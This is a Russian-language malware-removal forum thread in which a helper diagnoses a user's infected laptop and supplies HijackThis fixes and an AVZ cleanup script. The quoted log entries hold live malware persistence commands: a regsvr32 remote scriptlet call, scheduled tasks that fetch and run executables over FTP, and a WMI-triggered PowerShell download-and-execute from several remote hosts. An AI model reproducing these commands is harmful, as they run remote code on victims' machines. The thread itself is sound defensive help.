cerealguy3456 0 Опубликовано 13 февраля, 2020 Share Опубликовано 13 февраля, 2020 (изменено) После включения через пару минут запускается командная строка которая включает u.exe. Затем ноутбук зависает, не реагирует и не отключается. По адресу где расположен u.exe C:\Windows\inf\aspnet есть еще lsma12. Ноутбук работает только в безопасном режиме. Пожалуйста, подскажите как удалить вирус? CollectionLog-2020.02.13-14.24.zip Изменено 13 февраля, 2020 пользователем cerealguy3456 Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 13 февраля, 2020 Share Опубликовано 13 февраля, 2020 Здравствуйте! Пролечите систему с помощью KVRT. По окончании зайдите в папку C:\KVRT_Data\, упакуйте папку Reports в архив и прикрепите к следующему сообщению. Также соберите новый CollectionLog Автологером (пробуйте в нормальном режиме). Цитата Ссылка на сообщение Поделиться на другие сайты
cerealguy3456 0 Опубликовано 13 февраля, 2020 Автор Share Опубликовано 13 февраля, 2020 Здравствуйте! Спасибо за ответ! К сожалению в нормальном режиме так и не удалось просканировать и сделать лог. Даже проверка KVRT была в нормальном режиме один раз прервана. Файлы u.exe и lsma12.exe после удаления появляются снова. Reports.rar CollectionLog-2020.02.13-20.05.zip Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 14 февраля, 2020 Share Опубликовано 14 февраля, 2020 "Пофиксите" в HijackThis: O4 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa O22 - Task: oka - C:\Windows\system32\cmd.exe /c start c:\windows\inf\aspnet\lsma12.exe O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО. Выполните скрипт в AVZ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); SearchRootkit(true, true); SetAVZGuardStatus(True); ClearQuarantineEx(true); QuarantineFile('c:\windows\debug\item.dat', ''); QuarantineFile('c:\windows\debug\ok.dat', ''); QuarantineFile('c:\windows\help\lsmosee.exe', ''); QuarantineFile('c:\windows\inf\aspnet\lsma12.exe', ''); DeleteSchedulerTask('Mysa'); DeleteSchedulerTask('Mysa1'); DeleteSchedulerTask('Mysa2'); DeleteSchedulerTask('Mysa3'); DeleteSchedulerTask('ok'); DeleteSchedulerTask('oka'); DeleteSchedulerTask('VKDJ'); DeleteFile('c:\windows\debug\item.dat', '32'); DeleteFile('c:\windows\debug\ok.dat', '32'); DeleteFile('c:\windows\help\lsmosee.exe', '32'); DeleteFile('c:\windows\inf\aspnet\lsma12.exe', '32'); BC_ImportALL; ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); BC_Activate; RebootWindows(true); end. Компьютер перезагрузится. Пробуйте дальше работать в нормальном режиме. После перезагрузки выполните такой скрипт: begin CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); end.Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.comПолученный ответ сообщите здесь (с указанием номера KL-). Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift. Прикрепите к следующему сообщению свежий CollectionLog. Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.